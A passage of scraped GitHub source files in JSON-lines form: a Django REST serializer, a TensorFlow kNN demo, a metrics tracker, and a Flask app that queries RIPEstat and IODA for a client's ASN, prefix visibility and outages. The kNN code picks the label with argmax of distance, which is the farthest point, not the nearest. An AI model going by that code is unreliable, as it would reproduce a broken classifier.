\"fra[iî]ches?|\" \\\n \"cru[es]*|\" \\\n \"en moyenne|\" \\\n \"moyen(ne)?\" \\\n \")$\"\n return re.sub(reg, '', name)\n","repo_name":"zifeo/Food-habits","sub_path":"0-mining/fddb.py","file_name":"fddb.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"41122116181","text":"from rest_framework import serializers\nfrom rest_framework.viewsets import ModelViewSet\nfrom parflow_data_management.scheduler.models.workflow import Workflow\n\nclass WorkflowSerializer(serializers.ModelSerializer):\n class Meta:\n model = Workflow\n fields = (\"id\", \"project\")\n\nclass WorkflowViewSet(ModelViewSet):\n queryset = Workflow.objects.all()\n\n serializer_class = WorkflowSerializer\n","repo_name":"cjh1/parflow_data_management","sub_path":"parflow_data_management/scheduler/rest/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"38046980899","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"使用TensorFlow实现kNN算法\"\"\"\n\n\ngroup1_x1 = np.random.random(100) * 2\ngroup1_x2 = np.random.random(100) * 2\ngroup1_y = np.ones(group1_x1.shape)\ngroup2_x1 = np.random.random(100) * 2 + 1\ngroup2_x2= np.random.random(100) * 2 + 1\ngroup2_y = np.zeros(group2_x1.shape)\n\ntrain_x1 = np.concatenate([np.reshape(group1_x1, [-1, 1]), np.reshape(group1_x2, [-1, 1])], axis=1)\ntrain_x2 = np.concatenate([np.reshape(group2_x1, [-1, 1]), np.reshape(group2_x2, [-1, 1])], axis=1)\ntrain_x = np.concatenate([train_x1, train_x2], axis=0)\ntrain_y = np.concatenate([np.reshape(group1_y, [-1, 1]), np.reshape(group2_y, [-1, 1])], axis=0)\n\n\n\n\ndef kNN():\n input_x = tf.placeholder(tf.float32, [None, 2], name='input_x')\n label_y = tf.placeholder(tf.float32, [None, 1], name='label_y')\n\n test_x = tf.placeholder(tf.float32, [2], name='test_x')\n\n distance = tf.reduce_mean(tf.square(test_x - input_x), axis=1)\n predict = tf.gather(label_y, tf.argmax(distance, axis=0))\n\n return input_x, label_y, test_x, predict\n\ndef eval(test_sample):\n input_x, label_y, test_x, predict = kNN()\n with tf.Session() as sess:\n feed_dict = {input_x:train_x, label_y:train_y, test_x:test_sample}\n predict_label = sess.run(predict, feed_dict)\n print('Predition:{}'.format(predict_label[0]))\n show_figure(test_sample)\n return predict_label\n\ndef show_figure(test_sample):\n plt.scatter(group1_x1, group1_x2, color='blue')\n plt.scatter(group2_x1, group2_x2, color='yellow')\n plt.scatter(test_sample[0], test_sample[1], color='red')\n plt.show()\n\n\n\nif __name__ == '__main__':\n test_sample = np.array([2.2, 2.2])\n eval(test_sample)\n\n","repo_name":"AgFeather/StudyNote","sub_path":"models/TFBasicML/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22864488908","text":"import math\nfrom collections import defaultdict\n\n\nclass MetricsTracker(object):\n \"\"\" Tracking metrics. \"\"\"\n\n def __init__(self):\n self.metrics_val = defaultdict(float) # for one batch\n self.metrics_avg = defaultdict(float) # avg batches\n self.num_samples = 0\n\n def update(self, metrics, num_samples):\n for key, val in metrics.items():\n if val is not None:\n val = float(val) # [val] -> val\n self.metrics_val[key] = val\n avg_val = \\\n (self.metrics_avg.get(key, 0) * self.num_samples + val * num_samples) / \\\n (self.num_samples + num_samples)\n self.metrics_avg[key] = avg_val\n self.num_samples += num_samples\n\n def clear(self):\n self.metrics_val = defaultdict(float)\n self.metrics_avg = defaultdict(float)\n self.num_samples = 0\n\n def items(self):\n return self.metrics_avg.items()\n\n def get(self, name):\n if self.num_samples == 0:\n raise ValueError('There is no data in Metrics.')\n return self.metrics_avg.get(name)\n\n def state_dict(self):\n return {\n 'metrics_val': self.metrics_val,\n 'metrics_avg': self.metrics_avg,\n 'num_samples': self.num_samples,\n }\n\n def load_state_dict(self, state_dict):\n self.metrics_val = state_dict['metrics_val']\n self.metrics_avg = state_dict['metrics_avg']\n self.num_samples = state_dict['num_samples']\n\n def value(self):\n metric_strs = []\n for key, val in self.metrics_val.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_val:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_val['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n\n def summary(self):\n metric_strs = []\n for key, val in self.metrics_avg.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_avg:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_avg['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/nlp/space/metrics/metrics_tracker.py","file_name":"metrics_tracker.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"10852355774","text":"from asyncio import events\nfrom pytz import country_names\nimport requests\nimport json\nfrom requests import get\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@ app.route('/', methods=['GET'])\ndef get_tasks():\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n return {'ip': request.environ['REMOTE_ADDR']}\n else:\n return {'ip': request.environ['HTTP_X_FORWARDED_FOR']}\n\n\n@ app.route(\"/ip\")\n# private=socket.gethostbcket.gethos\n# adr=\"185.185.179.8\"\ndef ip_info():\n ip = {}\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n sourcevisib = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+adr+\"%2F24\"\n\n responseip = requests.get(sourceip).json()\n visible = requests.get(sourcevisib).json()\n\n prefix = responseip[\"data\"][\"records\"][0][0][\"value\"]\n ip[\"prefix\"] = prefix\n\n rpki = \"https://stat.ripe.net/data/rpki-validation/data.json?resource=38999&prefix=\"+prefix\n pk = requests.get(rpki).json()\n isp = responseip[\"data\"][\"records\"][0][1][\"value\"]\n ip[\"isp\"] = isp\n country = responseip[\"data\"][\"records\"][0][2][\"value\"]\n ip[\"country\"] = country\n ipp = responseip[\"data\"][\"irr_records\"][0][0][\"value\"]\n ip[\"ip\"] = ipp\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n ip[\"asncode\"] = a\n ip[\"asnname\"] = b\n if (any(c.isalpha() for c in b) == False):\n ip[\"asncode\"] = b\n ip[\"asnname\"] = a\n\n try:\n rpk = pk[\"data\"][\"validating_roas\"][\"validity\"]\n ip[\"rpki\"] = rpk\n except:\n ip[\"rpki\"] = \"Not valid\"\n\n ipv4_seeing = visible[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = visible[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n\n if (ipv4_seeing == ipv4_total):\n ip[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n ip[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n ipv6_seeing = visible[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = visible[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n\n if (ipv6_seeing == ipv6_total):\n ip[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n ip[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n with open(\"ip.json\", \"w\") as outfile:\n json.dump(ip, outfile)\n\n return ip\n\n\n@ app.route(\"/as\")\ndef asn_info():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dictionary = {}\n sous_dictionnaire = {}\n dictionnaire = {}\n # sourceasn=\"https://stat.ripe.net/data/country-resource-list/data.json?resource=LB\"\n # responseasn = requests.get(sourceasn).json()\n # ASN=responseasn[\"data\"][\"resources\"][\"asn\"]\n\n # for asn in ASN:\n source = 
\"https://stat.ripe.net/data/visibility/data.json?include=peers_seeing&resource=\"+asn\n source2 = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n source3 = \"https://stat.ripe.net/data/whois/data.json?resource=\"+asn\n source1 = 'https://ihr.iijlab.net/ihr/api/networks/?number='+asn\n\n # nb of prefixes for each autonomous system\n url = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n response1 = requests.get(url).json()\n nb = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"] + \\\n response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n sous_dictionnaire[\"Number of prefixes\"] = nb\n sous_dictionnaire[\"v4\"] = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"]\n sous_dictionnaire[\"v6\"] = response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n\n # list of prefixes for an as\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n print(prefix)\n dictionnaire[j] = prefix\n j = j+1\n sous_dictionnaire[\"List of prefixes\"] = dictionnaire\n ipv4_seeing = 0\n ipv4_total = 0\n ipv6_seeing = 0\n ipv6_total = 0\n response1 = requests.get(source2).json()\n response2 = requests.get(source3).json()\n response3 = requests.get(source1).json()\n\n print(\"Time:\")\n time = response1[\"data\"][\"last_seen\"][\"time\"]\n sous_dictionnaire[\"time\"] = time\n print(time)\n\n name = response2[\"data\"][\"records\"][0][1][\"value\"]\n print(\"ASN name:\"+name)\n print(response1[\"data\"][\"visibility\"])\n sous_dictionnaire[\"name\"] = name\n print(name)\n\n disco = response3[\"results\"][0][\"disco\"]\n print(\"Disconnection:\"+str(disco))\n sous_dictionnaire[\"disconnection\"] = disco\n\n for i in response1:\n ipv4_seeing = response1[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = response1[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n if (ipv4_seeing == ipv4_total):\n sous_dictionnaire[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n sous_dictionnaire[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n for i in response1:\n ipv6_seeing = response1[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = response1[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n if (ipv6_seeing == ipv6_total):\n sous_dictionnaire[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n sous_dictionnaire[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n dictionary[asn] = sous_dictionnaire\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(dictionary, outfile, indent=4)\n\n return dictionary\n\n\n# def event():\n# # dict = {}\n# #\n# # previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n# # times = str(int(round(previous_date.timestamp())))\n# #\n# # curr_date = datetime.datetime.now()\n# # times1 = str(int(round(curr_date.timestamp())))\n# #\n# url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n# times+'&until='+times1+'&human=true&meta=country/LB'\n# # events = requests.get(url).json()\n# #\n# # start_time = events[\"queryParameters\"][\"from\"]\n# # end_time = events[\"queryParameters\"][\"until\"]\n# #\n# # timestamp = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp1 = 
datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # print(\"Events occured:\")\n# # list_events = events[\"data\"][\"events\"]\n# print(list_events)\n# # dict[\"Events\"] = list_events\n# #\n# print(\"Country:\")\n# # place = events[\"queryParameters\"][\"meta\"]\n# print(place)\n# # dict[\"Country\"] = place\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"events.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# def alert():\n# # dict = {}\n# #\n# # curr_date = datetime.datetime.now()\n# print(curr_date)\n# # timestamp = str(int(round(curr_date.timestamp())))\n# print(timestamp)\n# #\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=country/LB'\n# # alerts = requests.get(url).json()\n# #\n# # start_time = alerts[\"queryParameters\"][\"from\"]\n# # end_time = alerts[\"queryParameters\"][\"until\"]\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# print(\"Alerts:\")\n# # list_alerts = alerts[\"data\"][\"alerts\"]\n# print(list_alerts)\n# # dict[\"Alerts\"] = list_alerts\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"alerts.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# event()\n# alert()\n@ app.route(\"/history\")\ndef History():\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n\n history = {}\n\n sous_dict = {}\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n hist = requests.get(url).json()\n\n liste = []\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref = pref[0:(len(pref)-3)]\n\n for p in hist[\"data\"][\"by_origin\"][0][\"prefixes\"]:\n\n liste.append(p[\"prefix\"])\n\n j = 0\n while(j < len(liste)):\n liste[j] = liste[j][0:(len(liste[j])-3)]\n j = j+1\n\n for l in liste:\n\n if (pref == l):\n\n # date = \"2022\"\n\n i = 0\n\n for d in p[\"timelines\"]:\n\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n\n sous_dict[d[\"starttime\"][0:10]] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]] = d[\"full_peers_seeing\"]\n i = i+1\n\n return sous_dict\n\n\n@ app.route(\"/all\")\ndef All():\n\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='91.232.100.0'\n dictionnaire = {}\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n sous_dict = {}\n\n list_prefixe = 
\"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n dictionnaire[j] = prefix\n j = j+1\n sous_dict = {}\n\n k = 0\n\n while (k < len(dictionnaire)):\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\" + \\\n str(dictionnaire[k][0:(len(dictionnaire[k])-3)])\n\n hist = requests.get(url).json()\n\n for p in hist[\"data\"][\"by_origin\"]:\n if (p[\"origin\"] == asn):\n\n for d in p[\"prefixes\"][0][\"timelines\"]:\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n if (d[\"starttime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"starttime\"][0:10]] = sous_dict[d[\"starttime\"]\n [0:10]]+d[\"full_peers_seeing\"]\n if (d[\"endtime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"endtime\"][0:10]] = sous_dict[d[\"endtime\"]\n [0:10]] + d[\"full_peers_seeing\"]\n else:\n sous_dict[d[\"starttime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n\n k = k+1\n for i in sous_dict.keys():\n sous_dict[i] = sous_dict[i]/len(dictionnaire)\n\n return sous_dict\n\n\n@ app.route(\"/pred\")\ndef Pred():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-11T12%3A00%3A00&hide_empty_samples=false&max_samples=5000&resource=AS' + \\\n str(asn)+'&starttime=2021-04-11T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n return json\n\n\n@ app.route(\"/pay\")\ndef pays():\n country_names = {\n \"afghanistan\": \"AF\",\n \"land Islands\": \"AX\",\n \"albania\": \"AL\",\n \"algeria\": \"DZ\",\n \"american Samoa\": \"AS\",\n \"andorrA\": \"AD\",\n \"angola\": \"AO\",\n \"anguilla\": \"AI\",\n \"antarctica\": \"AQ\",\n \"antigua and Barbuda\": \"AG\",\n \"argentina\": \"AR\",\n \"armenia\": \"AM\",\n \"aruba\": \"AW\",\n \"australia\": \"AU\",\n \"austria\": \"AT\",\n \"azerbaijan\": \"AZ\",\n \"bahamas\": \"BS\",\n \"bahrain\": \"BH\",\n \"bangladesh\": \"BD\",\n \"barbados\": \"BB\",\n \"belarus\": \"BY\",\n \"belgium\": \"BE\",\n \"belize\": \"BZ\",\n \"benin\": \"BJ\",\n \"bermuda\": \"BM\",\n \"bhutan\": \"BT\",\n \"bolivia\": \"BO\",\n \"bosnia and herzegovina\": \"BA\",\n \"botswana\": \"BW\",\n \"bouvet island\": \"BV\",\n \"brazil\": \"BR\",\n \"british indian ocean territory\": \"IO\",\n \"brunei darussalam\": \"BN\",\n \"bulgaria\": \"BG\",\n \"burkina faso\": \"BF\",\n \"burundi\": \"BI\",\n \"cambodia\": \"KH\",\n \"cameroon\": \"CM\",\n \"canada\": \"CA\",\n \"cape verde\": \"CV\",\n \"cayman islands\": \"KY\",\n \"central african republic\": \"CF\",\n \"chad\": \"TD\",\n \"chile\": \"CL\",\n \"china\": \"CN\",\n \"christmas island\": \"CX\",\n \"cocos (Keeling) islands\": \"CC\",\n \"colombia\": \"CO\",\n \"comoros\": \"KM\",\n \"congo\": \"CG\",\n \"congo, The Democratic Republic of the\": \"CD\",\n \"cook islands\": \"CK\",\n \"costa rica\": \"CR\",\n \"cote d\\\"ivoire\": \"CI\",\n \"croatia\": \"HR\",\n \"cuba\": \"CU\",\n \"cyprus\": \"CY\",\n \"czech republic\": \"CZ\",\n \"denmark\": \"DK\",\n \"djibouti\": 
\"DJ\",\n \"dominica\": \"DM\",\n \"dominican republic\": \"DO\",\n \"ecuador\": \"EC\",\n \"egypt\": \"EG\",\n \"el salvador\": \"SV\",\n \"equatorial guinea\": \"GQ\",\n \"eritrea\": \"ER\",\n \"estonia\": \"EE\",\n \"ethiopia\": \"ET\",\n \"falkland islands (malvinas)\": \"FK\",\n \"faroe islands\": \"FO\",\n \"fiji\": \"FJ\",\n \"finland\": \"FI\",\n \"france\": \"FR\",\n \"french guiana\": \"GF\",\n \"french polynesia\": \"PF\",\n \"french southern territories\": \"TF\",\n \"gabon\": \"GA\",\n \"gambia\": \"GM\",\n \"georgia\": \"GE\",\n \"germany\": \"DE\",\n \"ghana\": \"GH\",\n \"gibraltar\": \"GI\",\n \"greece\": \"GR\",\n \"greenland\": \"GL\",\n \"grenada\": \"GD\",\n \"guadeloupe\": \"GP\",\n \"guam\": \"GU\",\n \"guatemala\": \"GT\",\n \"guernsey\": \"GG\",\n \"guinea\": \"GN\",\n \"guinea-bissau\": \"GW\",\n \"guyana\": \"GY\",\n \"haiti\": \"HT\",\n \"heard island and mcdonald islands\": \"HM\",\n \"holy see (vatican city state)\": \"VA\",\n \"honduras\": \"HN\",\n \"hong kong\": \"HK\",\n \"hungary\": \"HU\",\n \"iceland\": \"IS\",\n \"india\": \"IN\",\n \"indonesia\": \"ID\",\n \"iran, islamic republic of\": \"IR\",\n \"iraq\": \"IQ\",\n \"ireland\": \"IE\",\n \"isle of man\": \"IM\",\n \"israel\": \"IL\",\n \"italy\": \"IT\",\n \"jamaica\": \"JM\",\n \"japan\": \"JP\",\n \"jersey\": \"JE\",\n \"jordan\": \"JO\",\n \"kazakhstan\": \"KZ\",\n \"kenya\": \"KE\",\n \"kiribati\": \"KI\",\n \"korea, democratic people\\\"s republic of\": \"KP\",\n \"korea, republic of\": \"KR\",\n \"kuwait\": \"KW\",\n \"kyrgyzstan\": \"KG\",\n \"lao people\\\"s democratic republic\": \"LA\",\n \"latvia\": \"LV\",\n \"lebanon\": \"LB\",\n \"lesotho\": \"LS\",\n \"liberia\": \"LR\",\n \"libyan Arab Jamahiriya\": \"LY\",\n \"liechtenstein\": \"LI\",\n \"lithuania\": \"LT\",\n \"luxembourg\": \"LU\",\n \"macao\": \"MO\",\n \"macedonia, the former yugoslav republic of\": \"MK\",\n \"madagascar\": \"MG\",\n \"malawi\": \"MW\",\n \"malaysia\": \"MY\",\n \"maldives\": \"MV\",\n \"mali\": \"ML\",\n \"malta\": \"MT\",\n \"marshall islands\": \"MH\",\n \"martinique\": \"MQ\",\n \"mauritania\": \"MR\",\n \"mauritius\": \"MU\",\n \"mayotte\": \"YT\",\n \"mexico\": \"MX\",\n \"micronesia, federated states of\": \"FM\",\n \"moldova, republic of\": \"MD\",\n \"monaco\": \"MC\",\n \"mongolia\": \"MN\",\n \"montenegro\": \"ME\",\n \"montserrat\": \"MS\",\n \"morocco\": \"MA\",\n \"mozambique\": \"MZ\",\n \"myanmar\": \"MM\",\n \"namibia\": \"NA\",\n \"nauru\": \"NR\",\n \"nepal\": \"NP\",\n \"netherlands\": \"NL\",\n \"netherlands antilles\": \"AN\",\n \"new caledonia\": \"NC\",\n \"new zealand\": \"NZ\",\n \"nicaragua\": \"NI\",\n \"niger\": \"NE\",\n \"nigeria\": \"NG\",\n \"niue\": \"NU\",\n \"norfolk island\": \"NF\",\n \"northern mariana islands\": \"MP\",\n \"norway\": \"NO\",\n \"oman\": \"OM\",\n \"pakistan\": \"PK\",\n \"palau\": \"PW\",\n \"palestinian territory, occupied\": \"PS\",\n \"panama\": \"PA\",\n \"papua new guinea\": \"PG\",\n \"paraguay\": \"PY\",\n \"peru\": \"PE\",\n \"philippines\": \"PH\",\n \"pitcairn\": \"PN\",\n \"poland\": \"PL\",\n \"portugal\": \"PT\",\n \"puerto rico\": \"PR\",\n \"qatar\": \"QA\",\n \"reunion\": \"RE\",\n \"romania\": \"RO\",\n \"russian federation\": \"RU\",\n \"rwanda\": \"RW\",\n \"saint helena\": \"SH\",\n \"saint kitts and nevis\": \"KN\",\n \"saint lucia\": \"LC\",\n \"saint pierre and miquelon\": \"PM\",\n \"saint vincent and the grenadines\": \"VC\",\n \"samoa\": \"WS\",\n \"san marino\": \"SM\",\n \"sao tome and principe\": \"ST\",\n \"saudi arabia\": 
\"SA\",\n \"senegal\": \"SN\",\n \"serbia\": \"RS\",\n \"seychelles\": \"SC\",\n \"sierra leone\": \"SL\",\n \"singapore\": \"SG\",\n \"slovakia\": \"SK\",\n \"slovenia\": \"SI\",\n \"solomon islands\": \"SB\",\n \"somalia\": \"SO\",\n \"south africa\": \"ZA\",\n \"south georgia and the south sandwich islands\": \"GS\",\n \"spain\": \"ES\",\n \"sri lanka\": \"LK\",\n \"sudan\": \"SD\",\n \"s\": \"SR\",\n \"svalbard and jan mayen\": \"SJ\",\n \"swaziland\": \"SZ\",\n \"sweden\": \"SE\",\n \"switzerland\": \"CH\",\n \"syrian arab republic\": \"SY\",\n \"taiwan, province of china\": \"TW\",\n \"tajikistan\": \"TJ\",\n \"tanzania, united republic of\": \"TZ\",\n \"thailand\": \"TH\",\n \"timor-leste\": \"TL\",\n \"togo\": \"TG\",\n \"tokelau\": \"TK\",\n \"tonga\": \"TO\",\n \"trinidad and tobago\": \"TT\",\n \"tunisia\": \"TN\",\n \"turkey\": \"TR\",\n \"turkmenistan\": \"TM\",\n \"turks and caicos islands\": \"TC\",\n \"tuvalu\": \"TV\",\n \"uganda\": \"UG\",\n \"ukraine\": \"UA\",\n \"united arab emirates\": \"AE\",\n \"united kingdom\": \"GB\",\n \"united states\": \"US\",\n \"united states minor outlying islands\": \"UM\",\n \"uruguay\": \"UY\",\n \"uzbekistan\": \"UZ\",\n \"vanuatu\": \"VU\",\n \"venezuela\": \"VE\",\n \"viet nam\": \"VN\",\n \"virgin islands, british\": \"VG\",\n \"virgin islands, U.S.\": \"VI\",\n \"wallis and futuna\": \"WF\",\n \"western sahara\": \"EH\",\n \"yemen\": \"YE\",\n \"zambia\": \"ZM\",\n \"zimbabwe\": \"ZW\"\n }\n return country_names\n\n# @app.route(\"/alert\")\n# def alert():\n# dict = {}\n\n# curr_date = datetime.datetime.now()\n\n# timestamp = str(int(round(curr_date.timestamp())))\n\n\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=asn/3307'\n# alerts = requests.get(url).json()\n\n# start_time = alerts[\"queryParameters\"][\"from\"]\n# end_time = alerts[\"queryParameters\"][\"until\"]\n\n# timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n# timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n\n# list_alerts = alerts[\"data\"][\"alerts\"]\n\n# dict[\"Alerts\"] = list_alerts\n\n\n# dict[\"Start-time\"] = start\n\n\n# dict[\"End-time\"] = end\n\n# s=\"\"\n\n# if not list_alerts:\n# s=\"No Outages are expected\"\n# return s\n# else:\n# return list_alerts\n\n@ app.route(\"/message\")\ndef message():\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dict = {}\n mssg = {}\n previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n times = str(int(round(previous_date.timestamp())))\n\n curr_date = datetime.datetime.now()\n times1 = str(int(round(curr_date.timestamp())))\n\n url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n times+'&until='+times1+'&human=true&meta=asn/'+asn\n events = requests.get(url).json()\n\n start_time = events[\"queryParameters\"][\"from\"]\n end_time = events[\"queryParameters\"][\"until\"]\n\n timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n timestamp2 = 
